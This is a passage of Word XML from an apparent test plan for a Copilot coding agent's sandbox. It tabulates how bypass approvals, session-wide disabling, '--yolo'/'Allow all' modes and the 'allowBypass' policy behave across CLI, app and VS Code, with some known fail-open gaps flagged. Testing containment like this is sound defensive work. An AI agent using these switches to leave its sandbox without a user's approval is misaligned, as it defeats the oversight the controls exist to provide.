        <w:t xml:space="preserve"> in Strict.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="868"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1817"/>
        <w:gridCol w:w="1233"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1337"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Use case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">How to test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1817" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – Copilot app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – VS Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">BY-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Blocked command prompts for bypass</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (bypass allowed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Trigger FS-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1817" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Prompt: approve this attempt · keep blocked · disable for session (if policy permits)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Run outside the sandbox?</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — cancel · run once · More options → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Disable sandbox and run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Allow Outside Sandbox</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — one operation or whole session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">No prompt; runs directly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">BY-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Approve once only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Approve BY-01, then repeat a different blocked write</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1817" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Second command blocked again</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">BY-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Reject the prompt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Choose keep blocked / cancel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1817" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Command does not run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">BY-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Staged retry on Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Approve a bypass for a FS-blocked command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1817" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ First </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">"sandbox relaxed"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (FS/process loosened, network kept), then </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">"sandbox bypassed"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> if still blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">BY-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Disable for rest of session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CLI </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox disable</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (managed on, bypass allowed) · app "Disable sandbox and run" · VS Code approve session bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1817" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Off for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">this session only</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; saved policy unchanged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Banner </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Sandbox off for this session</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Re-enable sandbox</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> available</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Later commands run unrestricted until turned back on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">BY-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Session opt-out doesn't persist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">After BY-05, restart session / reattach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1817" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Sandbox back on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Ends on restart or reattach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ New session inherits host config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">BY-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Bypass prohibited</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (P4: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowBypass: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Trigger FS-04; try </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox disable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1817" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ No prompt — command stays blocked; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox disable</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> refused</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ No outside-sandbox option 🔍 (managed only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ No </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Allow Outside Sandbox</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; request fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">BY-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">VS Code: managed ON, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">allowBypass</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> omitted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">P2 profile without </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowBypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1817" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Bypass still offered (CLI default true)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ 🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Toggle </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">locked on</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — omitted = locked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">BY-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Allow-all / YOLO with sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Select </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Allow all</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (VS Code) or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--yolo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (CLI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1817" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--yolo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> suppressed if </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">disableBypassPermissionsMode: "disable"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; else auto-approves but sandbox still restricts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ "Allow all" blocked under same managed key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Sandbox still restricts under Allow all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Commands run with full rights, no prompts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">BY-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Bypass is not elevation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Approve bypass for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">reg add HKLM\…</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1817" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Still fails — runs as your user, no admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1233" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Same (no admin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Negative and failure-mode tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">The key property to prove: when the sandbox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">can't</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> run, Copilot fails </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">closed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, never silently open — except the known gaps flagged ⚠️ below.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="868"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1442"/>
        <w:gridCol w:w="1469"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1569"/>
        <w:gridCol w:w="1337"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Use case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">How to test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – Copilot app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – VS Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
